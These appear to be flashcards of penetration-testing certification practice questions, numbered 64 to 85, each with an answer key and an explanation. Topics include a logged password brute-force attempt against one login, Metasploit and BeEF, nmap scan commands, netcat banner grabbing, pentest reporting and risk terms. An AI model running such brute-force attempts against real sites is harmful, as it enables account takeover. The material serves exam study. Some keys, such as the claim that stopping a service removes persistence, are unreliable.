[443] [https-get-form] host: diontraining.com login: jason password: password
[443] [https-get-form] host: diontraining.com login: jason password: CompTIACySA+
[443] [https-get-form] host: diontraining.com login: jason password: 123456
[443] [https-get-form] host: diontraining.com login: jason password: qwerty
[443] [https-get-form] host: diontraining.com login: jason password: abc123
[443] [https-get-form] host: diontraining.com login: jason password: password1
[443] [https-get-form] host: diontraining.com login: jason password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: jason password: C0mpT1@P@$$w0rd
-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-

What type of attack was most likely being attempted by the attacker?

A.Password spraying
B.Impersonation
C.Credential stuffing
D.Brute force

A

D.Brute force

Explanation:
OBJ-4.3: This is an example of a brute force attack. Unlike password spraying that focuses on attempting only one or two passwords per user, a brute force attack focuses on trying multiple passwords for a single user. The goal of this attack is to crack the user’s password and gain access to their account. Password spraying, instead, refers to the attack method that takes a large number of usernames and loops them with a single password. We can use multiple iterations using several different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, eight different passwords are being attempted against a single username (jason). This is indicative of a brute force attempt against a single user rather than a password spraying attack. Impersonation is the act of pretending to be another person for fraudulent purposes. Credential stuffing is the automated injection of breached username/password pairs to fraudulently gain access to user accounts. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account, which the attacker can then hijack for their own purposes.

64
Q

What tool can be used as an exploitation framework during your penetration tests?

A.Nmap
B.Metasploit
C.Nessus
D.Autopsy

A

B.Metasploit

Explanation:
OBJ-4.1: The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Nessus is a very popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. Autopsy is used in digital forensic investigations.

65
Q

You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the attack’s target?

A.389
B.3389
C.443
D.21

A

C.443

Explanation:
OBJ-4.3: Web-based attacks would likely appear on port 80 (HTTP) or port 443 (HTTPS). An attack against Active Directory is likely to be observed on port 389 LDAP. An attack on an FTP server is likely to be observed on port 21 (FTP). An attack using the remote desktop protocol would be observed on port 3389 (RDP).

66
Q

You are working as part of a penetration testing team targeting Dion Training’s website. Which of the following tools should you use to attempt an XSS or injection attack against their website?

A.BeEF
B.Androzer
C.Netcat
D.Nikto

A

A.BeEF

Explanation:
OBJ-4.2: BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers. BeEF can be used for XSS and injection attacks against a website. Netcat is an open-source networking utility for debugging and investigating the network, and it can be used to create TCP/UDP connections and investigate them. Nikto is an open-source web server scanner that searches for potentially harmful files, checks for outdated web server software, and looks for problems with some web server software versions. Androzer is a security testing framework for Android apps and devices.

67
Q

You are a cybersecurity analyst who has been given the output from a system administrator’s Linux terminal. Based on the output provided, which of the following statements is correct?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
BEGIN OUTPUT 
———————--------- 
# nmap win2k16.local 
Nmap scan report for win2k16 (192.168.2.15) 
Host is up (0.132452s latency) 
Not shown: 997 closed ports   

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

# nc win2k16.local 80 
220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)   
# nc win2k16.local 22 
SSH-2.0-OpenSSH_7.2 Debian-2   

——————————
END OUTPUT
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

A.Your email server is running on a non standard port
B.Your email server has been compromised
C.Your organization has a vulnerable version of the SSH server software installed
D.Your web server has been compromised

A

A.Your email server is running on a non standard port

Explanation:
OBJ-4.1: As shown in the nmap scan’s output, only two standard ports are being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner returned shows that an SMTP server is running on port 80. SMTP normally runs on port 25 by default, so running it on port 80 means your email server (SMTP) runs on a non-standard port.

68
Q

You are working as part of a penetration testing team conducting an engagement against Dion Training’s network. You have been given a list of targets to scan in nmap in a text file called servers.txt. Which of the following Nmap commands should you use to find all the servers from the list with ports 80 and 443 enabled and save the results in an XML formatted file called results.txt for importing into your team’s report generation software?

A.nmap -p80,443 -sL servers.txt -oX results.txt
B.nmap -p80,443 -iL servers.txt -oX results.txt
C.nmap -p80,443 -oL servers.txt -oG results,txt
D.nmap -p80,443 -sL servers.txt -oG results.txt

A

B.nmap -p80,443 -iL servers.txt -oX results.txt

Explanation:
OBJ-4.1: The command (nmap -p80,443 -iL servers.txt -oX results.txt) will only perform an nmap scan against ports 80 and 443. The -iL option reads the list of targets from servers.txt and scans each of the listed servers’ IP addresses. The -oX option will save the results in an XML format to the file results.txt while still displaying the normal results to the shell. The option -sL will only list the servers to scan, and it will not actually scan them. The option -oG outputs the results to a file in a greppable format.

69
Q

An attacker uses the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?

A.locate type=ns
B.request type=ns
C.set type=ns
D.transfer type=ns

A

C.set type=ns

Explanation:
OBJ-4.2: The “set type=ns” command tells nslookup to report information only on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.

70
Q

Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, how it was remediated, the effectiveness of the incident response, and any identified gaps that might require improvement?

A.Forensic analysis report
B.Chain of custody
C.Trends analysis report
D.Lessons learned report

A

D.Lessons learned report

Explanation:
OBJ-5.2: The lessons learned report provides you with the details of the incident, its severity, the remediation method, and, most importantly, how effective your response was. Additionally, it provides recommendations for improvements in the future. A forensic analysis report would not provide recommendations for future improvements, even though it provides many of the other details. A trend analysis report describes whether behaviors have increased, decreased, or stayed the same over time. The chain of custody report is the chronological documentation or paper trail that records the custody, control, transfer, analysis, and disposition of physical or electronic evidence.

71
Q

Why must you have an established communication path and a client’s trusted point of contact during a penetration test?

A.To report indicators of compromise
B.To report non-exploitable vulnerabilities
C.To report a change in payment methods
D.To report bypassing the firewall

A

A.To report indicators of compromise

Explanation:
OBJ-5.4: If an indicator of a previous compromise is found during a penetration test, the team should pause their work and immediately inform the client’s trusted point of contact. The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contact their trusted point of contact within the organization to get further guidance. The trusted agents and communication paths should be determined when planning the engagement.

72
Q

Your company is concerned about the possibility of theft of sensitive information from their systems. The IT Director has directed that access to all USB storage devices be blocked on all corporate workstations to prevent this. The workstations should still be able to use other USB devices, like scanners, printers, keyboards, and mice. Which of the following command-line tools should you use to apply a Group Policy Object (GPO) to all workstations across the network to disable the use of USB storage devices?

A.gpresults
B.diskpart
C.gpupdate
D.sfc

A

C.gpupdate

Explanation:
OBJ-5.3: The gpupdate command refreshes a computer’s local Group Policy, as well as any Active Directory-based group policies. This command works on Windows 10, 8, 7, Vista, and XP. The gpupdate command can be used to apply a Group Policy that restricts access to USB removable storage devices (like USB thumb drives and hard drives). In some organizations, USB storage devices are blocked for security reasons to prevent leakage of confidential data and the introduction of viruses into the internal corporate network.

73
Q

Dion Training wants to implement technology within their corporate network to BEST mitigate the risk that a zero-day virus might infect their workstations. Which of the following should be implemented FIRST?

A.Application whitelist
B.Intrusion Detection System
C.Anti-malware solution
D.Host-based firewall

A

A.Application whitelist

Explanation:
OBJ-5.3: Application whitelisting will only allow a program to execute if it is specifically listed in the approved exception list. All other programs are blocked from running. This makes it the BEST mitigation against a zero-day virus. An intrusion detection system might detect the anomalous activity created by a piece of malware, but it will only log or alert based on the activity, not prevent it. A host-based firewall may prevent a piece of malware from establishing a network connection with a remote server. Still, again, it wouldn’t prevent infection or prevent it from executing. An anti-malware solution is a good investment towards improving your security. Since the threat is a zero-day virus, an anti-malware solution will not detect it using its signature database.

74
Q

You want to install a perimeter device on the network to ensure FTP commands are not being sent out over port 25. Which of the following devices would allow for deep packet inspection to catch this type of activity?

A.Layer 7 Firewall
B.Web Proxy
C.Layer 3 Switch
D.Protocol Analyzer

A

A.Layer 7 Firewall

Explanation:
OBJ-5.3: Layer 7 firewalls are application-filtering firewalls. FTP traffic does not usually travel over port 25 and should travel over port 21. Using a Layer 7 firewall, the device can perform a deep packet inspection (DPI) to identify which application or protocol is actually being used to send traffic over a given port.

75
Q

During a penetration test, you find a hash value related to malware associated with an APT. What best describes what you have found?

A.Indicator of compromise
B.Botnet
C.SQL Injection
D.XSRF

A

A.Indicator of compromise

Explanation:
OBJ-5.4: An indicator of compromise is an artifact observed on a network or in an operating system that, with high confidence, indicates a computer intrusion. Typical IOCs are virus signatures and IP addresses, MD5 hashes of malware files or URLs, or botnet command and control servers’ domain names. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit such commands: specially crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A botnet consists of many Internet-connected devices, each of which is running one or more bots. Botnets can be used to perform Distributed Denial-of-Service (DDoS) attacks, steal data, send spam, and allow the attacker to access the device and its connection.

76
Q

Judith is conducting a vulnerability scan of her data center. She notices that a management interface for a virtualization platform is exposed to her vulnerability scanner. To which of the following networks should the hypervisor’s management interface be exposed to ensure the best security of the virtualization platform?

A.External zone
B.Internal Zone
C.DMZ
D.Management Network

A

D.Management Network

Explanation:
OBJ-5.3: The management interface should only be exposed to an isolated or dedicated network used for the management and configuration of the network device and platforms only. This would also help reduce the likelihood of an attack against the virtualization platform or the hypervisor itself. The external zone (internet), internal zone (LAN), or DMZ should not have the management interface exposed to them.

77
Q

Which of the following methods should a cybersecurity analyst use to locate any instances on the network where passwords are being sent in cleartext?

A.Full packet capture
B.Netflow capture
C.SIEM Event log monitoring
D.Software design documentation review

A

A.Full packet capture

Explanation:
OBJ-5.3: Full packet capture records the complete payload of every packet crossing the network. The other methods will not provide sufficient information to detect a cleartext password being sent. A NetFlow analysis will determine where communications occurred, by what protocol, to which devices, and how much content was sent. Still, it will not reveal anything about the content itself since it only analyzes the metadata for each packet crossing the network. A SIEM event log being monitored might detect that an authentication event has occurred. Still, it will not necessarily reveal whether the password was sent in cleartext, as a hash value, or as ciphertext. Software design documentation may also reveal the designer’s intentions for authentication when they created the application, but this only provides an ‘as designed’ view of a given piece of software and does not show whether the ‘as-built’ configuration was implemented securely.

78
Q

A network administrator updated an Internet server to evaluate some new features in the current release. A week after the update, the Internet server vendor warns that the latest release may have introduced a new vulnerability, and a patch is not available for it yet. Which of the following should the administrator do to mitigate this risk?

A.Enable the host-based firewall on the Internet server
B.Enable HIPS to protect the server until the patch is released
C.Utilize WAF to restrict malicious activity to the Internet server
D.Downgrade the server and defer the new feature testing

A

D.Downgrade the server and defer the new feature testing

Explanation:
OBJ-5.3: Since the vendor stated that the new version introduces vulnerabilities in the environment, it is better to downgrade the server to the older and more secure version until a patch is available.

79
Q

Why must you have an established communication path and a client’s trusted point of contact during a penetration test?

A.To change the scope of work
B.To report critical findings
C.To receive written authorization
D.To report a list of critical findings

A

B.To report critical findings

Explanation:
OBJ-5.4: If an indicator of a previous compromise is found during a penetration test, the team should immediately inform the client’s trusted point of contact unless the scope of work states otherwise. The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contact their trusted point of contact within the organization to get further guidance. The trusted agents and communication paths should be determined when planning the engagement.

80
Q

Dion Training conducts weekly vulnerability scanning of their network and patches any identified issues within 24 hours. Which of the following best describes the company’s risk response strategy?

A.Avoidance
B.Transference
C.Acceptance
D.Mitigation

A

D.Mitigation

Explanation:
OBJ-5.1: Risk mitigation is the overall process of reducing exposure to or the effects of risk factors, such as patching a vulnerable system. Transference (or sharing) means assigning risk to a third party (such as an insurance company or a contract with a supplier that defines liabilities). Avoidance means that the company stops doing the activity that is risk-bearing. Acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.

81
Q

What should NOT be included in your final report for the assessment and provided to the organization?

A.Executive summary
B.Methodology used
C.Findings and recommendations
D.Detailed list of cost incurred

A

D.Detailed list of cost incurred

Explanation:
OBJ-5.1: A detailed list of costs incurred is not required as part of the final report but instead would be included as part of your invoicing. Your report should contain an executive summary, your methodology used in the assessment, and your findings and prioritized recommendations.

82
Q

What term describes the amount of risk an organization is willing to accept?

A.Risk appetite
B.Risk mitigation
C.Risk acceptance
D.Risk avoidance

A

A.Risk appetite

Explanation:
OBJ-5.1: Risk appetite describes how much risk an organization is willing to accept. This is a crucial factor both in designing the assessment and determining the recommended mitigations. Risk mitigation is a strategy to prepare for and lessen the effects of threats faced by a data center. Risk mitigation refers to applying security controls to reduce the risk of a known vulnerability. Risk avoidance is the elimination of hazards, activities, and exposures that can negatively affect an organization’s assets. Risk acceptance is the act of accepting the identified risk and not taking additional actions to reduce the risk because the risk is low enough. Risk acceptance should only be done once an organization’s risk tolerance is defined and communicated amongst the decision-makers.

83
Q

Why must you have an established communication path and a client’s trusted point of contact during a penetration test?

A.To provide published vulnerability updates
B.To inform them of a security patch update
C.To report that a production server is unresponsive
D.To provide a summary of daily events

A

C.To report that a production server is unresponsive

Explanation:
OBJ-5.4: If a server becomes unresponsive during a penetration test, the team should pause their work and immediately inform the client’s trusted point of contact. The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contact their trusted point of contact within the organization to get further guidance. The trusted agents and communication paths should be determined when planning the engagement.

84
Q

Which of the following would NOT be useful in defending against a zero-day threat?

A.Segmentation
B.Patching
C.Threat Intelligence
D.Whitelisting

A

B.Patching

Explanation:
OBJ-5.3: While patching is a great way to combat threats and protect your systems, it is not effective against zero-day threats. By definition, a zero-day threat is a flaw in the software, hardware, or firmware that is unknown to the party or parties responsible for patching or otherwise fixing the flaw. There are zero days between the time the vulnerability is discovered and the first attack, and therefore no patch would be available to combat it. Using segmentation, whitelisting, and threat intelligence, a cybersecurity analyst can put additional mitigations in place to protect the network even if a zero-day attack was successful.

85
Q

You are working as part of a penetration testing team during an engagement. A coworker just entered “sudo systemctl stop DionTrainingApp” in the shell of a Linux server the team exploited. What action is your coworker performing with this command?

A.To enable persistence on the server
B.To enumerate the running services on the server
C.To remove persistence on the server
D.To shutdown the running service on the server

A

C.To remove persistence on the server

Explanation:
OBJ-5.2: This scenario uses the systemctl command to remove persistence from a Linux server within its shell. The systemd tool is an init system and system manager that has widely been adopted as the new standard for Linux distributions. systemctl is part of systemd and is used to manage services, check their status, change their status, and work with the configuration files. By entering “sudo systemctl stop DionTrainingApp” in the shell, the system will stop the service known as DionTrainingApp. This will remove any persistence gained by running the DionTrainingApp service, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.